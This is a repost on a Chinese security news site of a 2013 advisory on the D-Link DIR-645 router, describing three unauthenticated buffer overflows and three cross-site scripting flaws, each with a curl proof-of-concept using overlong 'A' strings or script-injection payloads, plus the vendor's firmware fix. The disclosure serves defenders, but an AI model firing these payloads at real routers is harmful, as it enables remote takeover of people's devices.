安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > 网络安全 > 漏洞分享 > Multiple vulnerabilities on D-Link DIR-645 devices

Multiple vulnerabilities on D-Link DIR-645 devices

时间:2014-07-01来源:WOOYUN 作者:网络点击:
http://www.exploit-db.com/exploits/33862/ [ADVISORY INFORMATION] Title: Multiple vulnerabilities on D-Link DIR-645 devices Discovery date: 06/03/2013 Release date: 02/08/2013 Advisory URL: http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt Cr

http://www.exploit-db.com/exploits/33862/ 

//本文来自安云网

[ADVISORY INFORMATION] 
Title:   Multiple vulnerabilities on D-Link DIR-645 devices 
Discovery date: 06/03/2013 
Release date: 02/08/2013 
Advisory URL: http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt 
Credits: Roberto Paleari (roberto (at) greyhats (dot) it [email concealed], twitter: @rpaleari) 

[AFFECTED PRODUCTS] 
This security vulnerability affects the following products and firmware  //本文来自安云网
versions: 
* D-Link DIR-645, 1.03B08 
Other products and firmware versions could also be vulnerable, but they were 
not checked. 

[VULNERABILITY DETAILS] 
This router model is affected by multiple security vulnerabilities. All of them 
are exploitable by remote, unauthenticated attackers. Details are outlined in 
the following, including some proof-of-concepts. 

1. Buffer overflow on "post_login.xml" 

Invoking the "post_login.xml" server-side script, attackers can specify a 

//内容来自安云网

"hash" password value that is used to authenticate the user. This hash value 
is eventually processed by the "/usr/sbin/widget" local binary. However, the 
latter copies the user-controlled hash into a statically-allocated buffer, 
allowing attackers to overwrite adjacent memory locations. 

As a proof-of-concept, the following URL allows attackers to control the 
return value saved on the stack (the vulnerability is triggered when 
executing "/usr/sbin/widget"): 

curl http://<target ip>/post_login.xml?hash=AAA...AAABBBB 
//本文来自安云网

The value of the "hash" HTTP GET parameter consists in 292 occurrences of 
the 'A' character, followed by four occurrences of character 'B'. In our lab 
setup, characters 'B' overwrite the saved program counter (%ra). 

2. Buffer overflow on "hedwig.cgi" 

Another buffer overflow affects the "hedwig.cgi" CGI script. Unauthenticated 
remote attackers can invoke this CGI with an overly-long cookie value that 
can overflow a program buffer and overwrite the saved program address. 

Proof-of-concept: 

//内容来自AnYun.ORG


curl -b uid=$(perl -e 'print "A"x1400;') -d 'test' http://<target ip>/hedwig.cgi 

3. Buffer overflow on "authentication.cgi" 

The third buffer overflow vulnerability affects the "authentication.cgi" CGI 
script. This time the issue affects the HTTP POST paramter named 
"password". Again, this vulnerability can be abused to achieve remote code 
execution. As for all the previous issues, no authentication is required. 

Proof-of-concept: 
curl -b uid=test -d $(perl -e 'print "uid=test&password=asd" . "A"x2024;') http://<target ip>/authentication.cgi  //内容来自AnYun.ORG

4. Cross-site scripting on "bind.php" 

Proof-of-concept: 
curl "http://<target ip>/parentalcontrols/bind.php?deviceid=test'\"/><script>alert(1)</script 
><" 

5. Cross-site scripting on "info.php" 

Proof-of-concept: 
curl "http://<target ip>/info.php?RESULT=testme\", msgArray); alert(1); //" 

6. Cross-site scripting on "bsc_sms_send.php" 
//本文来自安云网
Proof-of-concept: 
curl "http://<target ip>/bsc_sms_send.php?receiver=testme\"/><script>alert(1);</script><div" 

[REMEDIATION] 
D-Link has released an updated firmware version (1.04) that addresses this 
issue. The firmware is already available on D-Link web site, at the following 
URL: 
http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wirele 
ss-n-home-router-1000 

[DISCLAIMER] 
The author is not responsible for the misuse of the information provided in 
//本文来自安云网

this security advisory. The advisory is a service to the professional security 
community. There are NO WARRANTIES with regard to this information. Any 
application or distribution of this information constitutes acceptance AS IS, 
at the user's own risk. This information is subject to change without notice.



一直觉得工控还有邮件服务器路由以及一些防火墙的案例里这种例子会比较多的 

//本文来自安云网


//本文来自安云网

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容